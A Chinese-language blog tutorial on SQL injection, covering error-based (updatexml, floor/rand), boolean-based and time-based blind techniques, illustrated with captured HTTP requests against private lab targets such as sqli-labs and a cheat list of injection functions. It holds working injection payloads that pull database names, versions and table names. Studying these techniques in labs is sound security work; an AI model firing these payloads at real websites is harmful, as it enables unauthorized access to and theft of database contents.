WEB 漏洞-SQL注入之查询方式及报错盲注
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句
SQL注入-报错盲注
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行半段或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类
- 基于报错的SQL盲注-报错回显(优先级:1)floor,updatexml,extractvalue
- 基于布尔的SQL盲注-逻辑判断(优先级:2)regexp,like,ascii,left,ord,mid
- 基于时间的SQL盲注-延时判断(优先级:3)if,sleep
基于报错的SQL盲注-报错回显
- 使用burp抓包进行手工注入测试
- XPATH 报错 updatexml()
POST /vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 192.168.50.10:82
Content-Length: 136
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:82/vul/sqli/sqli_iu/sqli_reg.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close
username=admin' and updatexml(1,concat('^',(select database()),'^'),1) and '1'='1&password=test&sex=&phonenum=&email=&add=&submit=submit
- group by重复键冲突,利用了rand()和group by语句聚合的特性,在生成字段和聚合的时候生成重复字段来使sql报错,由于使用了rand(),所以sql报错具有随机性
POST /vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 192.168.50.10:82
Content-Length: 240
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:82/vul/sqli/sqli_iu/sqli_reg.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close
username=admin' or (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) or '&password=test&sex=&phonenum=&email=&add=&submit=submit基于布尔的SQL盲注-逻辑判断
页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据
- 当前数据库database()的长度为8,返回true页面,否则FALSE页面
GET /Less-8/?id=1' and (length(database()))=8 --+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close- 猜当前数据库第一个字符,利用二分法,115为fal,114TRUE,数据库第一个字符ASCII为115,即s.同理修改substr(database(),2,1)可猜第二个字符,之后同理,当然在猜数据库字符前也可先猜数据库长度:length(database())
GET /Less-8/?id=1' and ascii(substr(database(),1,1))=115--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close- 其他盲注语句
like 'ro%' #判断ro或ro...是否成立
regexp '^xiaodi[1-z]' #匹配xiaodi及xiaodi...等
if(条件,5,0) #条件成立,返回5,反之,返回0
sleep(5) #SQL语句延时执行5秒
mid(a,b,c) #从位置b开始,截取a字符串的c位
substr(a,b,c) #从B位置开始,截取字符串a的c长度
left(database(),1),database() #left(a,b)从左侧截取a的前b位
length(database())=8 #判断数据库database()名的长度
ord=ascii ascii(x)=97 #判断x的ascii码是否等于97基于时间的SQL盲注-延时判断
利用sleep()语句的延时性,以时间线作为判断条件
and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+
资源
Alipay
Wechat
最后一次更新于2021-12-07 09:50
0 条评论